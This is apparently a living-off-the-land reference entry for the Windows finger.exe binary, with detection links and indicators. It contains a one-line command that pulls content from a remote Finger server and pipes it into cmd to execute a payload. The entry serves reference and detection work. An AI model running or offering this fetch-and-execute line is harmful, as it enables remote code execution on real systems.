Finger.exe
Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Full path
c:\windows\system32\finger.exe
c:\windows\syswow64\finger.exeCommands
Download malicious payload
finger user@example.host.com | more +2 | cmdDownloads payload from remote Finger server. This example connects to “example.host.com” asking for user “user”; the result could contain malicious shellcode which is executed by the cmd process.
os: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
Detection
- Sigma https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml
- IOCfinger.exe should not be run on a normal workstation.
- IOCfinger.exe connecting to external resources.
Resources
acknowledgement: Ruben Revuelta (MAPFRE CERT) @rubn_RB, Jose A. Jimenez (MAPFRE CERT) @Ocelotty6669, Malwrologist @DissectMalware